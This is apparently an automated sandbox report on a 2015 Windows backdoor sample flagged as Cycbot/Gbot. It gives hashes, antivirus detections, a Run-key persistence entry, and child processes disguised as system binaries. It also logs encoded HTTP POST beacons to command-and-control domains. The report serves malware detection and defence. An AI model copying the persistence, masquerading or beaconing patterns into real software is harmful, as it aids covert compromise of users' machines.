Analysis Date: 2015-01-17 13:32:20
MD5: 3212c998d8936c003b78fc9787672602
SHA1: 24787179bfa871f584758b3cacf75431c1533e6e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 7ef643e707d30256f4c303c6ffa28d8e sha1: ae0432e26a649b78b414beb4fedf492463e3256b size: 112128
Section: .rdata md5: 34362d03965e9d8c8a6e9bf414dbec7d sha1: b7108d2eb7adc5064a2ad5adc6df86847ec77332 size: 1024
Section: .data md5: be2f683f0ee7adb0b70af0f72734ed95 sha1: a20e0b68c3b4712dd2274a59e9240f75be2a33d3 size: 67072
Section: .reloc md5: 7c78c3e3fbcde971eae5ec4520a61494 sha1: feeb2113e66a30c51053be7ec2c7ebf060717516 size: 1024
Timestamp: 2005-09-23 00:10:11
PEhash: ef6c4758985cc58a9797a07b6eca489e15a3d9d2
IMPhash: 8f12cf600beca18fe01658893cceab9c
AV: 360 Safe: no_virus
AV: Ad-Aware: Gen:Heur.Conjar.5
AV: Alwil (avast): Cybota [Trj]
AV: Arcabit (arcavir): Gen:Heur.Conjar.5
AV: Authentium: W32/Goolbot.K.gen!Eldorado
AV: Avira (antivir): TR/Crypt.ZPACK.Gen
AV: BullGuard: Gen:Heur.Conjar.5
AV: CA (E-Trust Ino): Win32/Cycbot.IO
AV: CAT (quickheal): Backdoor.Cycbot.B
AV: ClamAV: Trojan.Gbot-449
AV: Dr. Web: BackDoor.Gbot.73 - infected, incurable
AV: Emsisoft: Gen:Heur.Conjar.5
AV: Eset (nod32): Win32/Kryptik.SXV
AV: Fortinet: W32/Kryptik.SMY!tr.bdr
AV: Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV: F-Secure: Rogue:W32/OpenCloud.A
AV: Grisoft (avg): Win32/Cryptor
AV: Ikarus: Backdoor.Win32.Cycbot
AV: K7: Backdoor ( 003210941 )
AV: Kaspersky: Trojan.Win32.Generic
AV: MalwareBytes: Backdoor.Bot
AV: Mcafee: BackDoor-EXI.gen.n
AV: Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan): Gen:Heur.Conjar.5
AV: Rising: Backdoor.Win32.Cycbot.a
AV: Sophos: Mal/FakeAV-IS
AV: Symantec: Backdoor.Trojan
AV: Trend Micro: BKDR_CYCBOT.SME3
AV: VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: 127.0.0.1
Winsock DNS: yourmediaresources.com
Winsock DNS: yourblogresources.com
Winsock DNS: gravatar.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: gravatar.com, Type: A, 192.0.80.240
DNS: gravatar.com, Type: A, 192.0.80.241
DNS: gravatar.com, Type: A, 192.0.80.242
DNS: gravatar.com, Type: A, 192.0.80.239
DNS: zonedg.com, Type: A, 141.8.225.80
DNS: zonedg.com, Type: A, 141.8.225.80
DNS: coolmediastore.com, Type: A
DNS: yourblogresources.com, Type: A
DNS: yourmediaresources.com, Type: A
HTTP GET: http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v72=84&tq=gHZutDyMv5rJeTfia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 192.0.80.240:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap

Strings